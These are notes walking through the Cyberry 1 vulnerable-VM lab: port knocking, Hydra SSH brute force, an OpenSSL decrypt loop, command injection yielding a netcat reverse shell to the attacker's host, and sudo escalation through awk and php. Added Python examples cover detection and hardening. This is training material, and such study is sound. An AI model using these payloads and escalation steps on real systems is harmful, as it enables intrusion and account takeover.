
VM 1 Cyberry:


Walkthru:

A. https://prasannakumar.in/infosec/vulnhub-cyberry-1-writeup/ [Port knocking, comments in HTML, Brainfuck code, Hydra for SSH, executing commands remotely using SSH, installing ftp, openssl decrypt loop passing through all supported ciphers, file command, command injection vulnerability and adding nc to a web request, head command, sudo access, switching to another user using sudo, escaping a restricted shell using awk, running a shell using php -r, creating a PHP page/script using echo, creating a custom password dictionary based on hints]

B. http://www.secremoval.com/cyberry-walkthrough.html [Burp Suite to get root access to the admin panel, details about how to identify a command injection vulnerability, installing a backdoor, user enumeration, unalias]

C. https://vulniverse.blogspot.com/2018/01/cyberry-1-walkthrough-well-so-much-for.html [base64 decode, QR code, buffer overflow but not complete ]

D. https://www.sans.org/reading-room/whitepapers/sysadmin/port-knocking-basics-1634 [What is port Knocking]

E. https://copy.sh/brainfuck/ [A Brainfuck editor & optimizing interpreter, written in JavaScript]

F. https://stackoverflow.com/questions/16056135/how-to-use-openssl-to-encrypt-decrypt-files [How to encrypt and decrypt using Openssl]

G. https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/ [Restricted Linux Shell Escaping Techniques]

H. https://github.com/joenorton8014/offense/wiki/Breaking-Out-of-a-Limited-Shell-in-Linux [Breaking Out of a Limited Shell in Linux]

I. https://hackso.me/cyberry-1-walkthrough/ [Port knocking to create all port combination]

See Inventory Sheet:

Notes:
1. Ran nmap. Port 666 was showing as closed after some time, probably because the machine was running low on resources. Should have rebooted it once this was observed.
2. Nikto and dirb showed a few directories, but nothing that pointed to anything useful.
3. Full Nmap scan shows TCP ports 21, 22, 80 & 666.
- Found the name "Chuck" in the HTML comments of one of the pages. Tried brute-forcing SSH and FTP with Hydra using it, but no luck.
- I took a look at the web server on port 80. It serves up a basic homepage with a clock set to quarter-to-one and no useful-looking links or login buttons to play with. Although the page doesn't give much away, view-source contained some base64 encoded comments which look like they could be our first clue: [see walkthru C]


I copied this into a text file and decided to run dirbuster against the site to see what else may be hiding there. While this was running, I took the opportunity to decode the mysterious base64 messages:


Okay, so we have an html file and an image to check out. Dirbuster had also turned up several more files and things were starting to look promising.

- Also tried an SQL injection login bypass on the phpMyAdmin page, but no luck.
- Was able to create a login on the other page (ip/login.php), but it didn't have anything useful.
- Enumerating port 666 with Netcat:
root@kali:~# nc 192.168.1.104 666
Interesting fact:
The tiny hairs on raspberries and blackberries are called
"styles" and are leftover from the berry blossom and serve
to protect the berry from damage.
Have a a great day!

- Moving on to port 80. Browsing http://192.168.1.104
- From http://192.168.1.104/login.php, I saw a link to the main site http://192.168.1.104/berrypedia.html. You have to pay close attention: the placeholder image filename is spelled differently from the other filenames (placeho1der, with a digit one).


- Browsing http://192.168.1.104/placeho1der.jpg. When I rotate the image, it says PORT OF TACOMA.


The picture says “Port of Tacoma”. On further research, I learned that the four people pictured are singers who sang the same song, ‘I Hear You Knocking’, in different years.
From top left, clockwise, name and release year of the song: Smiley Lewis – 1955, Dave Edmunds – 1970, Fats Domino – 1961, Gale Storm – 1955. Based on the port and the song name, I concluded that this is a clue related to port knocking. [NOT SURE HOW WE GOT FROM THE WORDS PORT OF TACOMA TO THE SONG]
After a lot of strenuous effort and trial and error, I pinged the creators of the VM, @cyberrsec, for a hint. Based on the hint and further enumeration I got the sequence as anti-clockwise on the ‘main’ placeho1der.jpg, starting from Dave Edmunds. The sequence of ports for port knocking is 1970 1955 1955 1961.


- Port knocking using Nmap
  • for port in 1970 1955 1955 1961; do nmap -p $port 192.168.1.104 --host-timeout 201 --max-retries 0; done
After executing the above shell loop in a terminal, I initiated a full port scan using Nmap. Now port 61955/TCP shows up, running Apache httpd. I also tried scanning these 4 ports manually, one by one and all in a single nmap command, but port 61955/tcp didn't show up that way ????
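Why the order (and the repeated 1955) matters is easiest to see in a model of the daemon side. The Python below is an added example, not code from this writeup or any of the linked walkthroughs: it models a knock-sequence matcher that tracks each source address and resets on any out-of-sequence port (an assumed model of how such daemons behave, not knockd's own code), then checks which of the 12 distinct orderings of the four ports actually open. It also answers the question above: a single nmap run sends one probe per distinct port, in random order unless -r is given, so it can never deliver the doubled 1955 knock in sequence. The port numbers and the Kali address 192.168.1.101 are taken from this page.

```python
import itertools

# Knock sequence from the writeup: Dave Edmunds, Smiley Lewis, Gale Storm, Fats Domino.
KNOCK_SEQUENCE = (1970, 1955, 1955, 1961)


class KnockMonitor:
    """Minimal model of a knock daemon's sequence matcher.

    Each source address is tracked on its own and must hit the sequence ports in
    exact order; a knock on any other port resets that client's progress. This is
    an assumed model of the behaviour, not knockd's code.
    """

    def __init__(self, sequence=KNOCK_SEQUENCE):
        self.sequence = tuple(sequence)
        self.progress = {}       # source IP -> number of knocks matched so far
        self.opened_for = set()  # source IPs that completed the sequence

    def observe(self, src_ip, dst_port):
        """Feed one observed SYN (src_ip -> dst_port); return True once open for src_ip."""
        matched = self.progress.get(src_ip, 0)
        if dst_port == self.sequence[matched]:
            matched += 1
        elif dst_port == self.sequence[0]:
            matched = 1          # wrong port for this step, but it restarts the sequence
        else:
            matched = 0
        if matched == len(self.sequence):
            self.opened_for.add(src_ip)
            matched = 0
        self.progress[src_ip] = matched
        return src_ip in self.opened_for


def replay(ports, src_ip="192.168.1.101", sequence=KNOCK_SEQUENCE):
    """Replay knocks from one client against a fresh monitor; True if it opened."""
    monitor = KnockMonitor(sequence)
    opened = False
    for port in ports:
        opened = monitor.observe(src_ip, port)
    return opened


def unique_orderings(ports=KNOCK_SEQUENCE):
    """Distinct orderings of the knock ports; the repeated 1955 collapses 24 to 12."""
    return set(itertools.permutations(ports))


def orderings_that_open(ports=KNOCK_SEQUENCE, sequence=KNOCK_SEQUENCE):
    """The subset of unique_orderings that the matcher actually accepts."""
    return {order for order in unique_orderings(ports) if replay(order, sequence=sequence)}


if __name__ == "__main__":
    print("orderings to try:", len(unique_orderings()))
    print("orderings that open:", orderings_that_open())
    # A single `nmap -p 1970,1955,1961` sends one probe per distinct port, in random
    # order unless -r is given, so the doubled 1955 knock never arrives in sequence.
    print("one scan over the distinct ports opens:", replay([1955, 1961, 1970]))
```

The 12 orderings are the same ones the permutation.txt below enumerates; only the exact sequence opens, which is why the knock.sh loop has to run one sequence at a time and re-scan after each.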

Use the following script to perform port knocking on all the different combinations:

To that end, I wrote a port-knocking script using nmap [source walkthru I]

# cat knock.sh
#!/bin/bash

TARGET=$1

for ports in $(cat permutation.txt); do
    echo "[*] Trying sequence $ports..."
    for p in $(echo $ports | tr ',' ' '); do
        nmap -n -v0 -Pn --max-retries 0 -p $p $TARGET
    done
    sleep 3
    nmap -n -v -Pn -p- -A --reason $TARGET -oN ${ports}.txt
done

permutation.txt contains all the permutations of 1955, 1955, 1961 and 1970 and I use Python to generate it.
# python -c 'import itertools; print(list(itertools.permutations([1955,1955,1961,1970])))' | sed 's/), /\n/g' | tr -cd '0-9,\n' | sort | uniq
1955,1955,1961,1970
1955,1955,1970,1961
1955,1961,1955,1970
1955,1961,1970,1955
1955,1970,1955,1961
1955,1970,1961,1955
1961,1955,1955,1970
1961,1955,1970,1955
1961,1970,1955,1955
1970,1955,1955,1961
1970,1955,1961,1955
1970,1961,1955,1955 
When the script reaches the sequence 1970,1955,1955,1961, the port 61955/tcp appears.
A new port 61955 was found hosting a web service.
Browsing http://192.168.1.104:61955
While enumerating this website, similar to the one hosted on port 80, I found a link http://192.168.1.104:61955/H

Browsing http://192.168.1.104:61955/H

The page shows Brainf**k code. I used the Brainf**k interpreter [link E] line by line (paste a line on the website and you get the result) and stored the output in a file ‘brainy.txt’, with the following results.
root@kali:~# cat brainy.txt 
Hello World!
team members
chuck
halle
nick
terry
mary
kerry
pw:bakeoff
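Because the page's program was decoded one line at a time, it helps to see what the interpreter actually does. The Python below is an added example (my own code, not from the writeup or the copy.sh interpreter): a small Brainfuck interpreter that checks bracket balance before running and enforces a step limit, so a looping program pulled from a target cannot hang the decoder, plus a run_lines helper that mirrors the line-by-line decoding above. HELLO_WORLD is the standard public program and prints the same first line brainy.txt shows; encode_text and SAMPLE_PROGRAM are constructed for the test.

```python
def run_brainfuck(program, stdin=b"", cell_count=30000, max_steps=1_000_000):
    """Execute a Brainfuck program and return whatever it printed.

    Brackets are matched up front so an unbalanced program is rejected before it
    runs, and max_steps stops a non-terminating program from hanging the decoder.
    """
    jumps, stack = {}, []
    for i, ch in enumerate(program):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")

    cells = bytearray(cell_count)   # 8-bit cells that wrap, like most interpreters
    ptr = pc = steps = 0
    stdin_iter = iter(stdin)
    output = bytearray()
    while pc < len(program):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        ch = program[pc]
        if ch == ">":
            ptr = (ptr + 1) % cell_count
        elif ch == "<":
            ptr = (ptr - 1) % cell_count
        elif ch == "+":
            cells[ptr] = (cells[ptr] + 1) & 0xFF
        elif ch == "-":
            cells[ptr] = (cells[ptr] - 1) & 0xFF
        elif ch == ".":
            output.append(cells[ptr])
        elif ch == ",":
            cells[ptr] = next(stdin_iter, 0)   # EOF reads as 0
        elif ch == "[" and cells[ptr] == 0:
            pc = jumps[pc]
        elif ch == "]" and cells[ptr] != 0:
            pc = jumps[pc]
        pc += 1   # any other character is a comment
    return output.decode("latin-1")


def run_lines(program_text):
    """Run each non-empty line as its own program, as the writeup did by hand."""
    return [run_brainfuck(line) for line in program_text.splitlines() if line.strip()]


def encode_text(text):
    """Naive encoder used only to build test programs: set the cell, print, clear."""
    return "".join("+" * byte + ".[-]" for byte in text.encode("latin-1"))


# The standard public Hello World program; it prints the same first line as brainy.txt.
HELLO_WORLD = ("++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]>>.>---.+++++++..+++."
               ">>.<-.<.+++.------.--------.>>+.>++.")

# Constructed stand-in for the page at /H: one output per line, as in the writeup.
SAMPLE_PROGRAM = "\n".join(encode_text(word) for word in ["team members", "chuck", "pw:bakeoff"])

if __name__ == "__main__":
    print(repr(run_brainfuck(HELLO_WORLD)))
    print(run_lines(SAMPLE_PROGRAM))
```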
Seems like a password and username list. Creating a username list ‘user.lst’ based on the brainy.txt.
root@kali:~# cat user.lst 
chuck
halle
nick
terry
mary
kerry
Using Hydra to find the right combination of the credentials.
root@kali:~# hydra -L user.lst -p bakeoff ssh://192.168.1.104
......
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
[DATA] attacking ssh://192.168.1.104:22/
[22][ssh] host: 192.168.1.104   login: mary   password: bakeoff
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-18 07:24:07
Trying username ‘mary’ and password ‘bakeoff’ for SSH access
root@kali:~# ssh mary@192.168.1.104
mary@192.168.1.104's password: bakeoff

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 18 01:57:39 2018 from 192.168.1.101
Connection to 192.168.1.104 closed.
The connection is closed immediately. I tried appending a command to the SSH invocation, e.g. “ssh mary@192.168.1.104 id”, but that didn’t work either. So I concluded that there is no shell defined for the user “mary”. Trying the same credentials on the FTP service gave access.
- Install the ftp client using: apt-get install ftp

root@kali:~# ftp 192.168.1.104
Connected to 192.168.1.104.
220 ProFTPD 1.3.5b Server (Debian) [192.168.1.104]
Name (192.168.1.104:root): mary
331 Password required for mary
Password:bakeoff
230 User mary logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwt   3 mary     mary         4096 Jan 18 02:01 .
drwxrwxrwt   3 mary     mary         4096 Jan 18 02:01 ..
drwxr-xr-x   2 mary     mary         4096 Nov 29 22:39 .bash_history
-rwxrwxrwt   1 mary     mary          220 Nov 20 00:34 .bash_logout
-rwxrwxrwt   1 mary     mary         3515 Nov 20 00:34 .bashrc
-rwxrwxrwt   1 mary     mary          675 Nov 20 00:34 .profile
226 Transfer complete
.bash_history being a directory seemed suspicious. Browsing to the .bash_history directory:
ftp> cd .bash_history
250 CWD command successful
ftp> ls -al
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 mary     mary         4096 Nov 29 22:39 .
drwxrwxrwt   3 mary     mary         4096 Jan 18 02:01 ..
-rw-r--r--   1 mary     mary           64 Nov 29 22:35 .reminder.enc
-rw-r--r--   1 mary     mary          122 Nov 29 22:39 .trash
226 Transfer complete
ftp> get .reminder.enc
local: .reminder.enc remote: .reminder.enc
200 PORT command successful
150 Opening BINARY mode data connection for .reminder.enc (64 bytes)
226 Transfer complete
64 bytes received in 0.00 secs (240.3846 kB/s)
ftp> get .trash
local: .trash remote: .trash
200 PORT command successful
150 Opening BINARY mode data connection for .trash (122 bytes)
226 Transfer complete
122 bytes received in 0.00 secs (191.2370 kB/s)
Downloaded the two files .reminder.enc and .trash from .bash_history to the attacker system. Investigating the files:
root@kali:~# file .reminder.enc 
.reminder.enc: openssl enc'd data with salted password
root@kali:~# cat .trash 
Most common passwords 2017 (Top 10)

123456
123456789
qwerty
12345678
111111
1234567890
1234567
password
123123
987654321

It seems .reminder.enc is a file encrypted with OpenSSL and .trash contains a list of passwords. The file needs to be decrypted. For easy access, .reminder.enc is renamed to reminder.enc and a password.lst is created from .trash:
root@kali:~# mkdir openssl_decrypt
root@kali:~# cp .reminder.enc openssl_decrypt/reminder.enc
root@kali:~# tail -n +3 .trash > openssl_decrypt/password.lst
root@kali:~# cd openssl_decrypt/
root@kali:~/openssl_decrypt# cat password.lst 
123456
123456789
qwerty
12345678
111111
1234567890
1234567
password
123123
987654321

To decrypt the file I had to iterate through all the ciphers OpenSSL supports and, for each cipher, try every password from ‘password.lst’. I used the following bash one-liner (an openssl decrypt loop passing through all supported ciphers):
  • for i in `openssl enc -ciphers | tail -n +2`;do for j in `cat password.lst`; do openssl ${i:1} -d -salt -md md5 -in reminder.enc -out "decrypted$i$j" -k $j;done;done 2>/dev/null
openssl enc -ciphers lists the ciphers OpenSSL supports. Running the loop creates a large number of files in the openssl_decrypt folder. Next, check which of them are ASCII text (the file command determines a file's type; here it reports empty, data, non-ISO and ASCII files):
root@kali:~/openssl_decrypt# file * | grep ASCII
decrypted-aes256987654321:                    Non-ISO extended-ASCII text, with no line terminators
decrypted-aes-256-cbc987654321:               Non-ISO extended-ASCII text, with no line terminators
decrypted-camellia128111111:                  Non-ISO extended-ASCII text, with CR line terminators, with escape sequences
decrypted-camellia-128-cbc111111:             Non-ISO extended-ASCII text, with CR line terminators, with escape sequences
decrypted-camellia-128-ctrpassword:           Non-ISO extended-ASCII text, with NEL line terminators, with overstriking
decrypted-camellia-192-ecb987654321:          ASCII text
decrypted-camellia-256-ecb987654321:          Non-ISO extended-ASCII text
decrypted-des-cfb1234567890:                  Non-ISO extended-ASCII text, with NEL line terminators, with overstriking
decrypted-des-cfb1qwerty:                     Non-ISO extended-ASCII text, with CR, LF line terminators, with escape sequences, with overstriking
decrypted-des-ecb1234567890:                  Non-ISO extended-ASCII text, with no line terminators, with escape sequences
decrypted-desx12345678:                       Non-ISO extended-ASCII text, with NEL line terminators
decrypted-desx-cbc12345678:                   Non-ISO extended-ASCII text, with NEL line terminators
decrypted-rc2-64-cbcpassword:                 Non-ISO extended-ASCII text, with NEL line terminators
decrypted-rc2-64password:                     Non-ISO extended-ASCII text, with NEL line terminators
password.lst:                                 ASCII text

Reading the decrypted file,
root@kali:~/openssl_decrypt# cat decrypted-camellia-192-ecb987654321 
In case I forget, my login is dangleberry69
A new password  ‘dangleberry69’ is found.
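The -md md5 in the decrypt loop deserves a closer look. Without -pbkdf2, openssl enc derives the key and IV from the password and the 8-byte salt stored in the file header using EVP_BytesToKey, and OpenSSL 1.1.0 changed the digest used there from MD5 to SHA-256, so a file produced by an older OpenSSL only decrypts when the old digest is forced. The Python below is an added example (mine, not from the writeup or the Stack Overflow thread linked as F): it parses the "Salted__" header that file recognised as "openssl enc'd data with salted password" and reimplements the derivation. The sample blob is constructed; only the candidate password 987654321 comes from this page.

```python
import hashlib

OPENSSL_MAGIC = b"Salted__"   # written by `openssl enc -salt` ahead of 8 salt bytes


def parse_openssl_header(blob):
    """Split `openssl enc` output into (salt, ciphertext).

    The layout is 8 bytes 'Salted__', 8 random salt bytes, then ciphertext; this
    header is what `file` reports as "openssl enc'd data with salted password".
    """
    if len(blob) < 16 or blob[:8] != OPENSSL_MAGIC:
        raise ValueError("not an OpenSSL salted ciphertext")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password, salt, key_len, iv_len, md="md5"):
    """Legacy OpenSSL key derivation (EVP_BytesToKey with count=1).

    D_1 = H(password || salt), D_i = H(D_{i-1} || password || salt), and the key
    and IV are cut from D_1 || D_2 || ... One hash per block is the entire cost of
    testing a candidate password, which is why a wordlist attack on such a file is
    cheap and why `-pbkdf2 -iter N` was later added to `openssl enc`.
    """
    derived, block = b"", b""
    while len(derived) < key_len + iv_len:
        block = hashlib.new(md, block + password + salt).digest()
        derived += block
    return derived[:key_len], derived[key_len:key_len + iv_len]


# Key/IV geometry for the two ciphers that showed up in the writeup's results.
def derive_aes_256_cbc(password, salt, md="md5"):
    return evp_bytes_to_key(password, salt, 32, 16, md)


def derive_camellia_192_ecb(password, salt, md="md5"):
    return evp_bytes_to_key(password, salt, 24, 0, md)   # ECB: key only, no IV


def digest_choice_matters(password, salt):
    """True when forcing -md md5 yields different material than the modern default."""
    return derive_aes_256_cbc(password, salt, "md5") != derive_aes_256_cbc(password, salt, "sha256")


# Constructed sample: magic, salt bytes 01..08, then 48 placeholder ciphertext bytes.
SAMPLE_BLOB = OPENSSL_MAGIC + bytes(range(1, 9)) + b"\x00" * 48
SAMPLE_PASSWORD = b"987654321"   # the wordlist entry that worked on this page

if __name__ == "__main__":
    salt, ciphertext = parse_openssl_header(SAMPLE_BLOB)
    key, _ = derive_camellia_192_ecb(SAMPLE_PASSWORD, salt)
    print("salt:", salt.hex(), "key:", key.hex(), "ciphertext bytes:", len(ciphertext))
```

The derivation is deterministic per (password, salt, digest), which is exactly why the loop had to try every cipher and every password but needed only one digest choice once the file's age was known.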
While enumerating http://192.168.1.104:61955, I found another login page similar to the one hosted on port 80. This login page didn't allow any registrations. It also reports when a username is wrong.
Testing username ‘mary’ and password ‘bakeoff’ shows:
In this case the password was wrong, and since no error was reported for the user, ‘mary’ is a registered user. Trying username ‘mary’ with the password ‘dangleberry69’ retrieved from the decrypted file, we gain access.
Visiting the section ub3r-s3cur3 at http://192.168.1.104:61955/ub3r-s3cur3/index.php, I see the output of an nslookup command based on the query.
This presented a classic command injection vulnerability, which can be exploited here to gain a low-privileged shell. [command injection vulnerability and adding nc to a web request] [How do we know this is a command injection vulnerability? See Walkthru B]
Set up a Netcat listener on the attacker system on port 443:
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
Using “Inspect Element”, edit the option values in the drop-down box to append a command that calls back to a reverse shell on the attacker system. Edit the option value as follows [google.com may already be present; you just have to add the rest of the nc command with the correct Kali IP address and hit submit]:
  • google.com; nc 192.168.1.101 443 -e /bin/bash
Submitting the query gains a reverse shell with the privileges of user ‘www-data’.

root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 38607
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
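For the defensive side of this finding, here is an added Python example (mine, not code from the box or from any of the linked walkthroughs) of the two controls that close the hole shown in Walkthru B's system("nslookup " . $host): validate the submitted value as a hostname, and hand it to nslookup as an argv element instead of through a shell. It also includes a detection helper for triaging 'host' values recorded in access logs; the sample batch is the form's default plus the two payloads quoted on this page, so the triage result is what a log review of this box would have shown.

```python
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# 1-63 characters each, no leading or trailing hyphen, at most 253 overall.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$){_LABEL}(?:\.{_LABEL})*\.?$")

# Characters that let a value escape a shell command line or start a new command.
SHELL_METACHARACTERS = frozenset(";|&`$<>(){}\n\r\\'\"")


def is_valid_hostname(value):
    """Allow-list check: accept only syntactically valid hostnames."""
    return bool(HOSTNAME_RE.match(value))


def build_lookup_command(host):
    """Return the argv for nslookup, or raise; never a string handed to a shell.

    Validating first matters even with an argv list: a value such as "-debug"
    would otherwise be parsed by nslookup as an option rather than a name.
    """
    if not is_valid_hostname(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["nslookup", host]


def run_lookup(host, timeout=10):
    """Hardened counterpart of the PHP page's system("nslookup " . $host)."""
    result = subprocess.run(build_lookup_command(host), capture_output=True, text=True, timeout=timeout)
    return result.stdout


def looks_like_injection(value):
    """Detection-side check for reviewing 'host' values recorded in access logs."""
    return any(ch in SHELL_METACHARACTERS for ch in value)


def triage(submissions):
    """Classify a batch of submitted values as 'ok' or 'suspicious'."""
    return {v: "ok" if is_valid_hostname(v) and not looks_like_injection(v) else "suspicious"
            for v in submissions}


# Constructed batch: the form's default plus the two payloads quoted on this page.
SAMPLE_SUBMISSIONS = [
    "google.com",
    "google.com; uname -a;",
    "google.com; nc 192.168.1.101 443 -e /bin/bash",
]

if __name__ == "__main__":
    for value, verdict in triage(SAMPLE_SUBMISSIONS).items():
        print(f"{verdict:10s} {value}")
```

Note that the metacharacter check is a detection aid, not the control: the allow-list validator plus argv-style execution is what removes the shell from the picture, and the check exists so that submissions rejected by the validator can still be found in historical logs.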

Further enumeration revealed another password list. (The head command is a command-line utility for outputting the first part of files given to it via standard input; it writes its results to standard output. By default head returns the first ten lines of each file it is given.)
www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$ ls -al     
ls -al
total 20
drwxr-xr-x 3 www-data www-data 4096 Nov 30 01:37 .
drwxr-xr-x 9 www-data www-data 4096 Dec  8 22:49 ..
-rw-r--r-- 1 www-data www-data  312 Nov 29 23:30 index.php
-rw-r--r-- 1 www-data www-data  644 Nov 25 11:45 nb-latin
drwxrwxrwx 2 www-data www-data 4096 Dec  8 14:57 teamdocs
www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$ head -n 10 nb-latin
head -n 10 nb-latin
porto
portavi
amo
amavi
paro
paravi
video
vidi
mitto
misi
www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$
Copying nb-latin to use as password.lst, together with the already created user.lst, a new set of credentials is found using Hydra:

root@kali:~# hydra -L user.lst -P password.lst ssh://192.168.1.104
.....
[DATA] attacking ssh://192.168.1.104:22/
[22][ssh] host: 192.168.1.104   login: nick   password: custodio
[STATUS] 371.00 tries/min, 371 tries in 00:01h, 233 to do in 00:01h, 16 active
Gaining SSH access as  user nick with password custodio
root@kali:~# ssh nick@192.168.1.104
nick@192.168.1.104's password:custodio 
Last login: Wed Jan 17 21:39:14 2018 from 192.168.1.106
nick@cyberry:~$ id
uid=1003(nick) gid=1004(nick) groups=1004(nick)
Now enumerating the commands permitted under sudo shows:
nick@cyberry:~$ sudo -l
Matching Defaults entries for nick on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nick may run the following commands on cyberry:
    (terry) SETENV: NOPASSWD: /home/nick/makeberry
    (terry) SETENV: NOPASSWD: /home/nick/invoke.sh
Checking invoke.sh as user terry:
nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh
readlink: missing operand
Try 'readlink --help' for more information.
/home/nick/invoke.sh: 24: shift: can't shift that many
nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh -h
usage: invoke.sh -e KEY=VALUE prog [args...]
nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh /usr/bin/id
uid=1004(terry) gid=1005(terry) groups=1005(terry)
nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh /usr/bin/whoami
terry
Shifting from user nick to user terry


nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh /bin/bash -i
terry@cyberry:/home/nick$ id
uid=1004(terry) gid=1005(terry) groups=1005(terry)
Note: Refer to Appendix 2 for another possibility.
Checking again the sudo-permitted commands for user terry:
terry@cyberry:/home/nick$ sudo -l
Matching Defaults entries for terry on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User terry may run the following commands on cyberry:
    (halle) SETENV: NOPASSWD: /usr/bin/awk

Shifting from user terry to user halle [awk is an interpreted programming language designed for text processing. It is a standard feature of most Unix-like operating systems, which is why it is commonly found among the commands allowed in restricted environments... see Walkthru/link G]:
terry@cyberry:/home/nick$ sudo -u halle awk 'BEGIN {system("/bin/sh")}'
$ id
uid=1001(halle) gid=1001(halle) groups=1001(halle)
Checking again the sudo-permitted commands for user halle:
sudo -l
Matching Defaults entries for halle on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User halle may run the following commands on cyberry:
    (chuck) SETENV: NOPASSWD: /usr/bin/php
Shifting from user halle to user chuck [running php -r: php is the PHP command-line interpreter, and the -r option runs PHP code given on the command line without the <?php tags]:
$ sudo -u chuck php -r 'system("/bin/bash -i");'
chuck@cyberry:/home/nick$ 
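The three hops above (invoke.sh as terry, awk as halle, php as chuck) are each a sudo rule that effectively grants "run anything" to the caller. As an added example from the hardening side (my code, not from the writeup or any linked walkthrough), the Python below parses sudo -l output of the form shown above and flags the properties that made each hop possible: NOPASSWD, SETENV, a shell-capable interpreter as the target command, and a target path under the caller's own home directory. The sample outputs are copied from this page (secure_path trimmed); the list of shell-capable binaries is my own assumption of what to flag.

```python
import re

# One rule line as `sudo -l` prints it: "(runas) TAG: TAG: /path/to/command [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")
CALLER_RE = re.compile(r"^User (?P<user>\S+) may run the following commands")

# Interpreters and pagers whose ordinary features spawn other programs, so a rule
# for one of them is in effect a rule for any command. Assumed list; extend as needed.
SHELL_CAPABLE = frozenset({
    "awk", "gawk", "mawk", "php", "perl", "python", "python2", "python3", "ruby",
    "lua", "node", "vim", "vi", "less", "more", "find", "env",
    "sh", "bash", "dash", "zsh", "ksh",
})


def parse_sudo_l(output):
    """Return (caller, rules) where each rule is {"runas", "tags", "cmd"}."""
    caller, rules = None, []
    for line in output.splitlines():
        m = CALLER_RE.match(line.strip())
        if m:
            caller = m.group("user")
            continue
        m = RULE_RE.match(line)
        if m and caller is not None:            # skip the Defaults block above the rules
            tags = [t for t in m.group("tags").replace(" ", "").split(":") if t]
            rules.append({"runas": m.group("runas"), "tags": tags, "cmd": m.group("cmd")})
    return caller, rules


def audit_rule(caller, rule):
    """List the risk properties of one rule, in a fixed order."""
    findings = []
    if "NOPASSWD" in rule["tags"]:
        findings.append("NOPASSWD")
    if "SETENV" in rule["tags"]:
        findings.append("SETENV")                # caller controls the target's environment
    binary = rule["cmd"].split()[0]
    if binary == "ALL":
        findings.append("ALL_COMMANDS")
    if binary.rsplit("/", 1)[-1] in SHELL_CAPABLE:
        findings.append("SHELL_CAPABLE")         # BEGIN{system()}, php -r, and the like
    if caller and binary.startswith(f"/home/{caller}/"):
        findings.append("CALLER_WRITABLE_PATH")  # caller can replace what runs as runas
    return findings


def audit_sudo_l(output):
    """Map each permitted command to its findings."""
    caller, rules = parse_sudo_l(output)
    return {rule["cmd"]: audit_rule(caller, rule) for rule in rules}


# Samples copied from the writeup's three `sudo -l` runs (secure_path line trimmed).
SAMPLE_NICK = """Matching Defaults entries for nick on cyberry:
    env_reset, mail_badpass

User nick may run the following commands on cyberry:
    (terry) SETENV: NOPASSWD: /home/nick/makeberry
    (terry) SETENV: NOPASSWD: /home/nick/invoke.sh
"""
SAMPLE_TERRY = """User terry may run the following commands on cyberry:
    (halle) SETENV: NOPASSWD: /usr/bin/awk
"""
SAMPLE_HALLE = """User halle may run the following commands on cyberry:
    (chuck) SETENV: NOPASSWD: /usr/bin/php
"""

if __name__ == "__main__":
    for sample in (SAMPLE_NICK, SAMPLE_TERRY, SAMPLE_HALLE):
        for cmd, findings in audit_sudo_l(sample).items():
            print(f"{cmd:28s} {' '.join(findings) or 'no findings'}")
```

Run against the page's three outputs, every rule is flagged: the nick rules because the scripts live in nick's own home directory, and the awk and php rules because the binaries themselves can spawn a shell, which is exactly the path the writeup follows.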
But when I issue any command in the new shell, an “Intrusion Detection System” turns on [see Walkthru B for how to disable it; I also pressed Ctrl+C to stop the countdown]:
chuck@cyberry:/home/nick$ id
Cyberry Intrusion Detection activated
System Failsafe Mode :SFM: will begin in:

So, coming back to the halle shell, I create a small PHP script that runs its first argument as a system command, so that I can enumerate the system as user chuck:
chuck@cyberry:/home/nick$ exit
$ echo \<\?php system\(\$argv\[1\]\)\; \?\> > /tmp/shell.php    
$ php /tmp/shell.php id
uid=1001(halle) gid=1001(halle) groups=1001(halle)
$ sudo -u chuck php /tmp/shell.php id
uid=1000(chuck) gid=1000(chuck) groups=1000(chuck),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Now, while browsing the home directory, I came across:

$ sudo -u chuck php /tmp/shell.php "ls -al /home/chuck"
total 40
drwxr-xr-x 3 chuck chuck 4096 Nov 30 23:21 .
